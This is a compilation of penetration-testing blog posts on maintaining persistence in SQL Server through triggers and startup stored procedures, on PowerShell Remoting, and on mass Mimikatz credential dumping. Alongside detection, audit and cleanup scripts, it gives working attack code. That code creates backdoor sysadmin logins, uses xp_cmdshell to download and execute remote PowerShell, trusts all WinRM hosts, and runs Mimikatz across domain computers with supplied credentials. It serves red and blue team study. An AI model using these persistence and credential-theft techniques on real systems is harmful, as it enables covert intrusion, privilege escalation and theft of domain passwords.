SELECT	@@SERVERNAME as server_name,
	(SELECT TOP 1 SCHEMA_NAME(schema_id) FROM sys.objects WHERE type = 'tr' and object_id like object_id) as schema_id,
	DB_NAME() as database_name,
	OBJECT_NAME(parent_id) as parent_name,
	OBJECT_NAME(object_id) as trigger_name,
	OBJECT_DEFINITION(object_id) as trigger_definition,
	OBJECT_ID,
	create_date,
	modify_date,
	CASE OBJECTPROPERTY(object_id, 'ExecIsTriggerDisabled')
		WHEN 1 THEN 'Disabled'
		ELSE 'Enabled'
        END AS status,
	OBJECTPROPERTY(object_id, 'ExecIsUpdateTrigger') AS isupdate ,
	OBJECTPROPERTY(object_id, 'ExecIsDeleteTrigger') AS isdelete ,
	OBJECTPROPERTY(object_id, 'ExecIsInsertTrigger') AS isinsert ,
	OBJECTPROPERTY(object_id, 'ExecIsAfterTrigger') AS isafter ,
	OBJECTPROPERTY(object_id, 'ExecIsInsteadOfTrigger') AS isinsteadof ,
	is_ms_shipped,
	is_not_for_replication
FROM sys.triggers WHERE 
OBJECT_DEFINITION(OBJECT_ID) LIKE '%xp_cmdshell%' OR
OBJECT_DEFINITION(OBJECT_ID) LIKE '%powershell%' OR
OBJECT_DEFINITION(OBJECT_ID) LIKE '%sp_addsrvrolemember%' 
ORDER BY name ASC

Malicious Trigger Removal

Below is some basic guidance for disabling and removing evil triggers.

Disabling Triggers

Disabling triggers may be a good option if you're still looking at the trigger's code, and don't feel comfortable fully removing it from the system yet. Note: Logon and DDL triggers can be disabled regardless of what database is currently selected, but for DML triggers you'll need to have the database selected that the trigger was created in.
DISABLE TRIGGER [persistence_ddl_1] on all server
DISABLE TRIGGER [persistence_ddl_2] on all server
DISABLE TRIGGER [persistence_logon_1] on all server
USE testdb
DISABLE TRIGGER [persistence_dml_1]

Removing Triggers

Once you're ready to commit to removing a trigger, you can use the TSQL statements below. Note: Logon and DDL triggers can be removed regardless of what database is currently selected, but for DML triggers you'll have to have the database selected that the trigger was created in.
DROP TRIGGER [persistence_ddl_1] on all server
DROP TRIGGER [persistence_ddl_2] on all server
DROP TRIGGER [persistence_logon_1] on all server
USE testdb
DROP TRIGGER [persistence_dml_1]

Automating the Attack

For those of you that don't like copying and pasting code, I've created a little demo script with the comically long name "Invoke-SqlServer-Persist-TriggerDDL.psm1". It only supports DDL triggers, but it works well enough to illustrate the point. By default, the script targets the event group "DDL_SERVER_LEVEL_EVENTS", but you could change the hardcoded value to "DDL_EVENTS" if you wanted to expand the scope. Below are some basic usage instructions for those who are interested. Once the triggers have been created, you can set them off by adding or removing a SQL login, or by executing any of the other DDL server-level events.

Script Examples
  1. Download or reflectively load the PowerShell script as shown below.
    IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/NetSPI/PowerShell/master/Invoke-SqlServer-Persist-TriggerDDL.psm1')
  2. Create a trigger to add a new SQL Server sysadmin login as the current domain user.
    Invoke-SqlServer-Persist-TriggerDDL -SqlServerInstance "SERVERNAME\INSTANCENAME" -NewSqlUser EvilSysAdmin -NewSqlPass Password123!
  3. Create a trigger to add a local administrator as the current domain user. This will only work if the SQL Server service account has local administrative privileges.
    Invoke-SqlServer-Persist-TriggerDDL -SqlServerInstance "SERVERNAME\INSTANCENAME" -NewOsUser EvilOsAdmin -NewOsPass Password123!
  4. Create a trigger to run an arbitrary PowerShell command. In this case the PowerShell script creates the file c:\temp\HelloWorld.txt.
    Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "SERVERNAME\INSTANCENAME" -PsCommand "IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/helloworld.ps1')"
  5. Remove the malicious trigger as the current domain user when you're all done.
    Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "SERVERNAME\INSTANCENAME" -Remove
    
    

Clean Up Script

Below is a script for cleaning up the mess we made during the labs. Some of the items were covered in the malicious trigger removal section, but this will cover it all.
-- Remove database and associated DML trigger
DROP DATABASE testdb

-- Select master database
USE master

-- Revoke all impersonate privilege provided to public role
REVOKE IMPERSONATE ON LOGIN::sa to [Public];

-- Remove logins
DROP LOGIN testuser
DROP LOGIN SysAdmin_DDL
DROP LOGIN SysAdmin_DML
    
-- Remove triggers
DROP TRIGGER [persistence_ddl_2] on all server
DROP TRIGGER [persistence_ddl_1] on all server
DROP TRIGGER [persistence_logon_1] on all server

-- Remove audit specifications
ALTER SERVER AUDIT Audit_Object_Changes WITH (STATE = OFF)
DROP SERVER AUDIT Audit_Object_Changes

ALTER SERVER AUDIT SPECIFICATION Audit_Server_Level_Object_Changes WITH (STATE = OFF)
DROP SERVER AUDIT SPECIFICATION Audit_Server_Level_Object_Changes

ALTER DATABASE AUDIT SPECIFICATION Audit_Database_Level_Object_Changes WITH (STATE = OFF)
DROP DATABASE AUDIT SPECIFICATION Audit_Database_Level_Object_Changes

Wrap Up

In this blog we learned how to use SQL Server triggers to maintain access to Windows systems. We also covered some options for detecting potentially malicious behavior. Hopefully, this will help create some awareness around this type of persistence method. Have fun and hack responsibly.

Maintaining Persistence via SQL Server – Part 1: Startup Stored Procedures

During red team and penetration test engagements, one common goal is to maintain access to target environments while security teams attempt to identify and remove persistence methods. There are many ways to maintain persistent access to Windows environments. However, detective controls tend to focus on compromised account identification and persistence methods at the operating system layer. While prioritizing detective control development in those areas is a good practice, common database persistence methods are often overlooked. In this blog series, I'm planning to take a look at a few techniques for maintaining access through SQL Server and how they can be detected by internal security teams. Hopefully they will be interesting to both red and blue teams. Below is an overview of what will be covered in this blog:

Why use SQL Server as a Persistence Method?

It may not be immediately obvious why anyone would use SQL Server or other database platforms to maintain access to an environment, so I've provided some of the advantages below.
  1. The .mdf files that SQL Server uses to store data and other objects such as stored procedures are constantly changing, so there is no easy way to use File Integrity Monitoring (FIM) to identify database layer persistence methods.
  2. SQL Server persistence methods that interact with the operating systems will do so under the context of the associated SQL Server service account. This helps make potentially malicious actions appear more legitimate.
  3. It's very common to find SQL Server service accounts configured with local administrative or LocalSystem privileges. This means that in most cases any command and control code running from SQL Server will have local administrative privileges.
  4. Very few databases are configured to audit for common Indicators of Compromise (IoC) and persistence methods.
With that out of the way, let's learn a little about stored procedures.

Introduction to Startup Stored Procedures

In SQL Server, stored procedures are basically chunks of SQL code intended for reuse that get compiled into a single execution plan. Similar to functions, they can accept parameters and provide output to the user. SQL Server ships with quite a few native stored procedures, but they can also be user defined. Once logged into SQL Server, it's possible to execute any stored procedure that the current user has privileges to execute. For more general information regarding stored procedures, visit https://technet.microsoft.com/en-us/library/aa174792(v=sql.80).aspx. The native sp_procoption stored procedure can be used to configure user-defined stored procedures to run when SQL Server is started or restarted. The general idea is very similar to the "run" and "run once" registry keys commonly used for persistence by developers, malware, and penetration testers. Before we get started on creating our evil startup stored procedures, there are a few things to be aware of. Stored procedures configured for automatic execution at start time:
  • Must exist in the Master database
  • Cannot accept INPUT or OUTPUT parameters
  • Must be marked for automatic execution by a sysadmin
General Note: Based on my time playing with this in a lab environment, all startup stored procedures are run under the context of the sa login, regardless of what login was used to flag the stored procedure for automatic execution. Even if the sa login is disabled, the startup procedures will still run under the sa context when the service is restarted.

Startup Stored Procedure Detection

In this section I've provided an example script that can be used to enable audit features in SQL Server that will log potentially malicious startup procedure activity to the Windows Application event log. Normally I would introduce the attack setup first, but if the audit controls are not enabled ahead of time, the events we use to detect the attack won't show up in the Windows Application event log. Important Note: Be aware that sysadmin privileges are required to run the script, and the recommendations in this section will not work on SQL Server Express, because SQL Server Auditing is a commercial feature. SQL Server Auditing can be used to monitor all kinds of database activity. For those who are interested in learning more, I recommend checking out this Microsoft site: https://technet.microsoft.com/en-us/library/cc280386(v=sql.110).aspx

Audit Setup Instructions

Follow the instructions below to enable auditing:
  1. Create and enable a SERVER AUDIT.
    -- Select master database
    USE master
    
    -- Setup server audit to log to application log
    CREATE SERVER AUDIT Audit_StartUp_Procs
    TO APPLICATION_LOG
    WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE)
    
    -- Enable server audit
    ALTER SERVER AUDIT Audit_StartUp_Procs
    WITH (STATE = ON)
  2. Create an enabled SERVER AUDIT SPECIFICATION. This will enable auditing of defined server level events. In this example, it's been configured to monitor group changes, server setting changes, and audit setting changes.
    -- Create server audit specification
    CREATE SERVER AUDIT SPECIFICATION Audit_StartUp_Procs_Server_Spec
    FOR SERVER AUDIT Audit_StartUp_Procs
    ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP),  -- track group changes
    ADD (SERVER_OPERATION_GROUP),           -- track server setting changes
    ADD (AUDIT_CHANGE_GROUP)                -- track audit setting changes
    WITH (STATE = ON)
  3. Create an enabled DATABASE AUDIT SPECIFICATION. This will enable auditing of specific database level events. In this case, the execution of the sp_procoption procedure will be monitored.
    -- Create the database audit specification
    CREATE DATABASE AUDIT SPECIFICATION Audit_StartUp_Procs_Database_Spec
    FOR SERVER AUDIT Audit_StartUp_Procs
    ADD (EXECUTE ON master..sp_procoption BY public)  -- track sp_procoption execution
    WITH (STATE = ON)
    GO
  4. All enabled server and database level audit specifications can be viewed with the queries below. Typically, sysadmin privileges are required to view them.
    -- List enabled server specifications
    SELECT		audit_id, 
            a.name as audit_name, 
            s.name as server_specification_name,
            d.audit_action_name,
            s.is_state_enabled,
            d.is_group,
            d.audit_action_id,	
            s.create_date,
            s.modify_date
    FROM sys.server_audits AS a
    JOIN sys.server_audit_specifications AS s
    ON a.audit_guid = s.audit_guid
    JOIN sys.server_audit_specification_details AS d
    ON s.server_specification_id = d.server_specification_id
    WHERE s.is_state_enabled = 1
    
    -- List enabled database specifications
    SELECT	a.audit_id,
            a.name as audit_name,
            s.name as database_specification_name,
            d.audit_action_name,
            s.is_state_enabled,
            d.is_group,
            s.create_date,
            s.modify_date,
            d.audited_result
    FROM sys.server_audits AS a
    JOIN sys.database_audit_specifications AS s
    ON a.audit_guid = s.audit_guid
    JOIN sys.database_audit_specification_details AS d
    ON s.database_specification_id = d.database_specification_id
    WHERE s.is_state_enabled = 1
    If you're interested in finding out about other server and database audit options, you can get a full list using the query below.
    Select DISTINCT action_id,name,class_desc,parent_class_desc,containing_group_name from sys.dm_audit_actions order by parent_class_desc,containing_group_name,name
    
    

Startup Stored Procedure Creation

Now for the fun part. The code examples provided in this section will create two stored procedures and configure them for automatic execution. As a result, the stored procedures will run the next time a patch is applied to SQL Server, or the server is restarted. As mentioned before, sysadmin privileges will be required. Note: This example was performed over a direct database connection, but could potentially be executed through SQL injection as well.
  1. If you're trying this out at home, you can download and install SQL Server with SQL Server Management Studio Express to use for connecting to the remote SQL Server. https://www.microsoft.com/en-us/download/details.aspx?id=42299.
  2. Log into the (commercial version of) SQL Server with sysadmin privileges.
  3. Enable the xp_cmdshell stored procedure. This may not be required, but xp_cmdshell is disabled by default.
    -- Enable xp_cmdshell
    sp_configure 'show advanced options',1
    RECONFIGURE
    GO
    
    sp_configure 'xp_cmdshell',1
    RECONFIGURE
    GO
    When a system setting like "xp_cmdshell" is changed, the Windows Application event log should include event ID 15457. Also, event ID 33205 should show up with a "statement" field set to "reconfigure". I don't see xp_cmdshell enabled very often, so most attackers will have to enable it to perform OS-level operations.
  4. Create a stored procedure to add a new sysadmin Login using the query below.
    ------------------------------
    -- Create a stored procedure 1
    ------------------------------
    USE MASTER
    GO
    
    CREATE PROCEDURE sp_add_backdoor_account
    AS
    
    -- create sql server login backdoor_account
    CREATE LOGIN backdoor_account WITH PASSWORD = 'Password123!';
    
    -- Add backdoor_account to sysadmin fixed server role
    EXEC sp_addsrvrolemember 'backdoor_account', 'sysadmin';
    
    GO
  5. Create a stored procedure that uses the xp_cmdshell stored procedure to download and execute a PowerShell payload from the internet using the query below. The script in the example simply writes a c:\temp\helloworld.txt file, but you can use any PowerShell payload. Something like a PowerShell Empire agent could be handy.
    ------------------------------
    -- Create a stored procedure 2
    ------------------------------
    USE MASTER
    GO
    
    CREATE PROCEDURE sp_add_backdoor
    AS
    -- Download and execute PowerShell code from the internet
    EXEC master..xp_cmdshell 'powershell -C "Invoke-Expression (new-object System.Net.WebClient).DownloadString(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/helloworld.ps1'')"'
    GO
  6. Configure the stored procedures to run when the SQL Server service is restarted using the query below.
    ------------------------------------------------
    -- Configure stored procedure to run at startup
    ------------------------------------------------
    -- Set 'sp_add_backdoor_account' to auto run
    EXEC sp_procoption @ProcName = 'sp_add_backdoor_account',
    @OptionName = 'startup',
    @OptionValue = 'on';
    
    -- Setup 'sp_add_backdoor' to auto run
    EXEC sp_procoption @ProcName = 'sp_add_backdoor',
    @OptionName = 'startup',
    @OptionValue = 'on';
    After execution, event ID 33205 should show up in the Windows Application event log if auditing has been enabled. The "object_name" should contain "sp_procoption", and the name of the startup stored procedure can be found in the "statement" field. I haven't seen this option used very often in production environments, so alerting on it shouldn't generate too many false positives.
  7. Confirm the configuration worked using the query below.
    -- List stored procedures mark for automatic execution
    SELECT [name] FROM sysobjects
    WHERE type = 'P'
    AND OBJECTPROPERTY(id, 'ExecIsStartUp') = 1;
  8. If you're doing this lab on a test instance on your own system, then you can restart the SQL Server service. If you're performing an actual penetration test, you'll have to wait for the service or server to restart before the procedures are executed. Usually that will happen during standard patch cycles, so if your procedures start a reverse shell you may have to wait a while. Very Important Note: Only perform this step in a lab environment and NEVER restart a production service. Unless of course you want to be attacked by an angry mob of DBAs and business line owners. That being said, you can restart the service with the sc or PowerShell Restart-Service commands (see the sketch after this list), or if you're a GUI fan you can just use services.msc. When the SQL Server service restarts, it will launch the startup procedures, and Windows event ID 17135 is used to track that event.
  9. Verify that a new sysadmin login named "backdoor_account" was added. When a login is added to the sysadmin fixed server role, event ID 33205 should show up again in the Application log. However, this time the "object_name" should contain "sysadmin", and the name of the affected account can be found in the "statement" field. Sysadmins shouldn't change too often in production environments, so this can also be a handy thing to monitor.
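For reference, a lab-only service restart from PowerShell might look like the sketch below (the service name is an assumption; the default instance is "MSSQLSERVER", while named instances use "MSSQL$<InstanceName>"):

# Lab only! Restart the SQL Server service so the startup procedures fire
Restart-Service -Name 'MSSQLSERVER' -Force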

Startup Stored Procedure Code Review

At this point you should be able to view the log entries described earlier (33205 and 17135). They should tell you what procedures to dig into. If you're interested in what they're doing, it's possible to view the source code for all startup stored procedures with the query below.
SELECT ROUTINE_NAME, ROUTINE_DEFINITION
FROM MASTER.INFORMATION_SCHEMA.ROUTINES
WHERE OBJECTPROPERTY(OBJECT_ID(ROUTINE_NAME),'ExecIsStartup') = 1
Be aware that you will need privileges to view them, but as a sysadmin it shouldn't be an issue.

Startup Stored Procedure Removal

My guess is that at some point you'll want to remove your sample startup procedures and audit settings, so below is a removal script.
-- Disable xp_cmdshell
sp_configure 'xp_cmdshell',0
reconfigure
go

sp_configure 'show advanced options',0
reconfigure
go

--Stop stored procedures from starting up
EXEC sp_procoption @ProcName = 'sp_add_backdoor',
@OptionName = 'startup',
@OptionValue = 'off';

EXEC sp_procoption @ProcName = 'sp_add_backdoor_account',
@OptionName = 'startup',
@OptionValue = 'off';

-- Remove stored procedures
DROP PROCEDURE sp_add_backdoor
DROP PROCEDURE sp_add_backdoor_account

-- Disable and remove SERVER AUDIT
ALTER SERVER AUDIT Audit_StartUp_Procs
WITH (STATE = OFF)
DROP SERVER AUDIT Audit_StartUp_Procs

-- Disable and remove SERVER AUDIT SPECIFICATION
ALTER SERVER AUDIT SPECIFICATION Audit_StartUp_Procs_Server_Spec
WITH (STATE = OFF)
DROP SERVER AUDIT SPECIFICATION Audit_StartUp_Procs_Server_Spec

-- Disable and remove DATABASE AUDIT SPECIFICATION
ALTER DATABASE AUDIT SPECIFICATION Audit_StartUp_Procs_Database_Spec
WITH (STATE = OFF)
DROP DATABASE AUDIT SPECIFICATION Audit_StartUp_Procs_Database_Spec

If an attacker decides to be clever and disables the audit settings, that will also show up under event ID 33205. In this case, the statement will include "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" along with the rest of the statement. Also, "object_name" will be the name of the SERVER AUDIT. This is another thing that shouldn't change very often in production environments, so it's a good thing to watch.
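A quick way to keep an eye on that is to periodically confirm the audits are still present and enabled:

-- Verify server audits still exist and are enabled
SELECT name, is_state_enabled, create_date, modify_date
FROM sys.server_audits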


Automating the Attack

I put together a little PowerShell script called "Invoke-SqlServer-Persist-StartupSp.psm1" to automate the attack. Below are some basic usage instructions for those who are interested.
  1. Download the script or reflectively load it from here.
    IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/NetSPI/PowerShell/master/Invoke-SqlServer-Persist-StartupSp.psm1')
  2. The example below shows how to add a SQL Server sysadmin via a startup stored procedure every time the SQL Server service is restarted.
    Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "MSSQL2008WIN8" -NewSqlUser EvilSysadmin1 -NewSqlPass Password123!
  3. The example below shows how to add a local Windows Administrator via a startup stored procedure every time the SQL Server service is restarted.
    Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "MSSQL2008WIN8" -NewosUser Evilosadmin1 -NewosPass Password123!
  4. The example below shows how to run arbitrary PowerShell code via a startup stored procedure every time the SQL Server service is restarted.
    Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "MSSQL2008WIN8" -PsCommand "IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/helloworld.ps1')"

Wrap Up

In this blog I covered how to create, detect, and remove malicious startup stored procedures in SQL Server. Hopefully, this will help create some awareness around this type of persistence method. Big thanks to Grisha Kumar and Ben Tindell for verifying all the code samples for this blog. Have fun and hack responsibly! Note: All testing was done on Windows 8 running SQL Server 2014 Standard Edition.

PowerShell Remoting Cheatsheet

I have become a big fan of PowerShell Remoting. I find myself using it for both penetration testing and standard management tasks. In this blog I'll share a basic PowerShell Remoting cheatsheet so you can too.

Introduction to PowerShell Remoting

PowerShell Remoting is essentially a native Windows remote command execution feature that's built on top of the Windows Remote Management (WinRM) protocol. Based on my super Google results, WinRM is supported by Windows Vista with Service Pack 1 or later, Windows 7, Windows Server 2008, and Windows Server 2012.
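Before enabling anything, you can check whether WinRM is already listening on a remote host with the native Test-WSMan cmdlet (the hostname below is a placeholder):

# Returns WSMan protocol details if the remote WinRM service is reachable
Test-WSMan -ComputerName server1.domain.com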

Enabling PowerShell Remoting

Before we get started let's make sure PowerShell Remoting is all setup on your system.

1. In a PowerShell console running as administrator enable PowerShell Remoting.

Enable-PSRemoting -Force

This should be enough, but if you have to troubleshoot you can use the commands below.

2. Make sure the WinRM service is setup to start automatically.

# Set start mode to automatic
Set-Service -Name WinRM -StartupType Automatic

# Verify start mode and state - it should be running
Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

3. Set all remote hosts to trusted. Note: You may want to unset this later.

# Trust all hosts
Set-Item WSMan:\localhost\Client\TrustedHosts -Value *

# Verify trusted hosts configuration
Get-Item WSMan:\localhost\Client\TrustedHosts

Executing Remote Commands with PowerShell Remoting

Now we can play around a little. There’s a great blog from a while back that provides a nice overview of PowerShell Remoting at https://blogs.technet.com/b/heyscriptingguy/archive/2009/10/29/hey-scripting-guy-october-29-2009.aspx. It’s definitely on my recommended reading list, but I'll expand on the examples a little.

Executing a Single Command on a Remote System

The "Invoke-Command" command can be used to run commands on remote systems. It can run as the current user or using alternative credentials from a non domain system. Examples below.

Invoke-Command -ComputerName MyServer1 -ScriptBlock {Hostname}
Invoke-Command -ComputerName MyServer1 -Credential demo\serveradmin -ScriptBlock {Hostname}

If the ActiveDirectory PowerShell module is installed it's possible to execute commands on many systems very quickly using the pipeline. Below is a basic example.

Get-ADComputer -Filter *  -properties name | select @{Name="computername";Expression={$_."name"}} | Invoke-Command -ScriptBlock {hostname}

Sometimes it’s nice to run scripts stored locally on your system against remote systems. Below are a few basic examples.

Invoke-Command -ComputerName MyServer1 -FilePath C:\pentest\Invoke-Mimikatz.ps1
Invoke-Command -ComputerName MyServer1 -FilePath C:\pentest\Invoke-Mimikatz.ps1 -Credential demo\serveradmin

Also, if you're dynamically generating commands or functions being passed to remote systems, you can use Invoke-Expression through Invoke-Command as shown below.

$MyCommand = "hostname"
$MyFunction = "function evil {write-host `"Getting evil...`";iex -command $MyCommand};evil"
invoke-command -ComputerName MyServer1 -Credential demo\serveradmin -ScriptBlock {Invoke-Expression -Command  "$args"} -ArgumentList $MyFunction

Establishing an Interactive PowerShell Console on a Remote System

An interactive PowerShell console can be obtained on a remote system using the "Enter-PsSession" command. It feels a little like SSH. Similar to "Invoke-Command", "Enter-PsSession" can be run as the current user or using alternative credentials from a non domain system. Examples below.

Enter-PsSession -ComputerName server1.domain.com
Enter-PsSession -ComputerName server1.domain.com -Credential domain\serveradmin

If you want out of the PowerShell session the "Exit-PsSession" command can be used.

Exit-PsSession

Creating Background Sessions

There is another cool feature of PowerShell Remoting that allows users to create background sessions using the "New-PsSession" command. Background sessions can come in handy if you want to execute multiple commands against many systems. Similar to the other commands, the "New-PsSession" command can run as the current user or using alternative credentials from a non domain system. Examples below.

New-PSSession -ComputerName server1.domain.com
New-PSSession -ComputerName server1.domain.com -Credential domain\serveradmin

If the ActiveDirectory PowerShell module is installed, it's possible to create background sessions for many systems at a time (this can be done in many ways). Below is a command example showing how to create background sessions for all of the domain systems. The example shows how to do this from a non-domain system using alternative domain credentials.

New-PSDrive -PSProvider ActiveDirectory -Name RemoteADS -Root "" -Server a.b.c.d -credential domain\user
cd RemoteADS:
Get-ADComputer -Filter * -Properties name  | select @{Name="ComputerName";Expression={$_."name"}} | New-PSSession

Listing Background Sessions

Once a few sessions have been established the "Get-PsSession" command can be used to view them.

Get-PSSession

Interacting with Background Sessions

The first time I used this feature I felt like I was working with Metasploit sessions, but these sessions are a little more stable. Below is an example showing how to interact with an active session using the session id.

Enter-PsSession -Id 3

To exit the session use the "Exit-PsSession" command. This will send the session into the background again.

Exit-PsSession

Executing Commands through Background Sessions

If your goal is to execute a command on all active sessions the "Invoke-Command" and "Get-PsSession" commands can be used together. Below is an example.

Invoke-Command -Session (Get-PSSession) -ScriptBlock {Hostname}

Removing Background Sessions

Finally, to remove all of your active sessions, the "Remove-PsSession" command can be used as shown below. (Note: "Disconnect-PsSession" only disconnects a session so it can be resumed later; "Remove-PsSession" actually closes it.)

Get-PSSession | Remove-PSSession 

Wrap Up

Naturally PowerShell Remoting offers a lot of options for both administrators and penetration testers. Regardless of your use case I think it boils down to this:

  • Use "Invoke-Command" if you're only going to run one command against a system
  • Use "Enter-PSSession" if you want to interact with a single system
  • Use PowerShell sessions when you're going to run multiple commands on multiple systems

Hopefully this cheatsheet will be useful. Have fun and hack responsibly.


Introduction

Mimikatz is a great "authentication token recovery tool" that the whole pentest community knows and loves. Since its initial development, it's been ported to PowerShell (Invoke-Mimikatz.ps1), and a few "Mass Mimikatz" scripts have been written that wrap around it so Mimikatz can be executed on many domain systems very quickly. Many "Mass Mimikatz" delivery methods have been used including, but not limited to, psexec, schtasks, wmic, and Invoke-WmiMethod. Regardless of their differences, they all make scraping Windows domain credentials easier. In this blog I'll cover some of that history and share my script "Invoke-MassMimikatz-PsRemoting.psm1", which tries to expand on other people's work. It uses PowerShell Remoting and Invoke-Mimikatz.ps1 to collect credentials from remote systems. The new script supports options for auto-targeting domain systems, targeting systems with the WinRM service installed using SPNs, and running from non-domain systems using alternative credentials. The content should be handy for penetration testers, but may also be interesting to blue teamers looking to understand how PowerShell Remoting and SPNs can be used during attacks.
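As a side note on the SPN-based targeting: when WinRM is enabled on a domain-joined system, it typically registers "WSMAN" service principal names on the computer account, so candidate targets can be enumerated from Active Directory. A hypothetical check with the native setspn utility (the domain name is a placeholder):

# Query the domain for WSMAN SPNs to find hosts with WinRM enabled
setspn -T domain.com -Q WSMAN/*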

A Brief History of the Mass Mimikatz

I thought it would be appropriate to start things off by highlighting some of the work done by others prior to writing my shabby script. Below are the projects that seemed to stick out the most to me. I highly recommend checking them out.
  • Mimikatz: For those who might be new to the security industry, Mimikatz is a great tool developed by Benjamin Delpy that can be used to dump cleartext passwords from memory (among many other things) as long as you have local administrator privileges. Benjamin seems to add new and amazing features on a pretty regular basis, so it's worth keeping an eye on the GitHub project and his blog. https://github.com/gentilkiwi/mimikatz
  • Invoke-Mimikatz: After Mimikatz had been around a while, Joseph Bialek ported it to PowerShell. This was a fantastic feat that made Mimikatz even easier to use for all of us IT security enthusiasts. It natively supports executing Mimikatz on remote systems using PowerShell Remoting as the current user. However, I don't believe that it supports using alternative credentials via PSCredential objects. The Invoke-Mimikatz GitHub repo is listed below. https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz
  • Mass Mimikatz: After the Invoke-Mimikatz script was released, it didn't take long for people to start writing scripts that execute it on a larger scale in creative ways. Rob Fuller released the first scripts I saw that wrapped around Invoke-Mimikatz.ps1. His scripts create a file share that hosts a .cmd file, which is then executed on remote systems via WMIC commands. The .cmd script then runs a PowerShell command on the remote systems that downloads Invoke-Mimikatz.ps1 into memory, runs it, and writes all of the passwords out to files on the hosted share. This can all be executed from a non-domain system using alternative credentials. His blog introducing the scripts is below. https://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
  • Invoke-MassMimikatz: In an effort to streamline the process a bit, Will Schroeder created a nice PowerShell script called "Invoke-MassMimikatz.ps1". It hosts "Invoke-Mimikatz.ps1" on a web server started by his script. Then Invoke-MassMimikatz.ps1 executes encoded PowerShell commands on remote systems using the "Invoke-WmiMethod" command, which downloads and executes "Invoke-Mimikatz.ps1" in memory. All of the Mimikatz output is then parsed and displayed in the PowerShell console. Invoke-MassMimikatz can also be executed from a non-domain system using alternative credentials. So it's similar to Rob's scripts, but consolidates everything into one script that uses a slightly different delivery method. https://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/
  • Metasploit: I would be neglectful if I didn't mention Metasploit. It includes quite a few options for obtaining shells on remote systems. Once you have a few active sessions, it's pretty easy to use the Mimikatz extension created by Ben Campbell to grab Windows credentials. Also, Ben Turner and Dave Hardy added support for fully interactive PowerShell sessions through Metasploit that can load any PowerShell module you want when the session is created, which is pretty cool. I recommend checking out their blog below. https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/

An Overview of the Invoke-MassMimikatz-PsRemoting Script

The "Invoke-MassMimikatz-PsRemoting" script provides another way to run Mimikatz on remote systems using PowerShell Remoting, but includes a few novel options. Naturally it's based on the heavy lifting done in the other projects. For those who are interested it can be downloaded from here. Below is a summary of the script and its features:
  • It wraps the native command “Invoke-Command“ to execute Invoke-Mimikatz.ps1 on remote systems, and the Invoke-Mimikatz.ps1 script is baked in.  As a result, no files have to be hosted, because "Invoke-Command" doesn’t suffer from the 8192 character limit enforced on commands passed through Invoke-WmiMethod and wmic.
  • It supports alternative credentials and execution from a non-domain system using PSCredential objects.
  • It supports automatically creating a target list of domain computers by querying a domain controller using ADSI. Since ADSI is used, the ActiveDirectory module is not required.
  • It supports filtering for domain computers with WinRM installed by filtering the Service Principal Names.
  • It supports the option to limit the number of systems to run Mimikatz on. The default is 5.
  • It uses Will’s Mimikatz output parser to provide clean output that can be used in the PowerShell pipeline.
  • It checks if the user credentials recovered from remote systems are a Domain or Enterprise admin.
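For context, below is a rough sketch of the kind of ADSI query the auto-targeting is built on. The module's actual implementation differs, and the domain controller IP and credentials here are placeholders. When the WinRM service is configured, a "WSMAN" SPN is registered on the computer account, which is what the filter keys on.

# Bind to a domain controller via ADSI using placeholder alternative credentials
$Entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://10.2.9.106","demo\user","MyPassword!")

# Find computer accounts that have registered a WSMAN SPN (WinRM installed)
$Searcher = New-Object System.DirectoryServices.DirectorySearcher($Entry)
$Searcher.PageSize = 1000
$Searcher.Filter = "(&(objectCategory=computer)(servicePrincipalName=WSMAN*))"
[void]$Searcher.PropertiesToLoad.Add("dnshostname")
$Searcher.FindAll() | ForEach-Object { [string]$_.Properties["dnshostname"] }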

Enabling PowerShell Remoting

Ok, first things first. Let's make sure PowerShell Remoting is all set up on the system you're running it from. You should be able to use the command below.
Enable-PSRemoting -Force
For more information and context check out this technet blog: https://technet.microsoft.com/en-us/magazine/ff700227.aspx If for some reason that doesn't work, you can use the commands below to troubleshoot.
# Set the service start mode to automatic
Set-Service WinRM -StartupType Automatic

# Verify start mode
Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

# Trust all hosts
Set-Item WSMan:\localhost\Client\TrustedHosts -Value *

# Verify trusted hosts configuration
Get-Item WSMan:\localhost\Client\TrustedHosts

Invoke-MassMimikatz-PsRemoting Function Examples

Below are a few examples. Keep in mind that the domain user used will require administrative privileges on the remote systems. Additional information and examples can be found in the commented section of the script. The function can be imported a few different ways. If you have outbound internet access you can load the function reflectively and not worry about the execution policy, but for the standard import methods the execution policy may have to be disabled/bypassed. Import examples are below.
# Import the function from the .psm1 file
Import-Module .\Invoke-MassMimikatz-PsRemoting.psm1

# Import the function reflectively from a URL
IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerShell/master/Invoke-MassMimikatz-PsRemoting.psm1')
Example 1: Running the function against 10.1.1.1 as the current domain user.
Invoke-MassMimikatz-PSRemoting -Verbose -Hosts "10.1.1.1"
Example 2: Running the function as the current domain user, grabbing a list of all domain systems, filtering for systems with WinRM installed, and only running Mimikatz on five of them.
Invoke-MassMimikatz-PSRemoting -Verbose -AutoTarget -MaxHost 5 -WinRM
Example 3: Using alternative domain credentials from a non-domain system, grabbing a list of all domain systems, and only running Mimikatz on one of them.
Invoke-MassMimikatz-PsRemoting -Verbose -AutoTarget -MaxHost 1 -Username corp\MyServerAdmin -Password 'MyServerPassword!' -DomainController 10.2.9.106 | ft -AutoSize
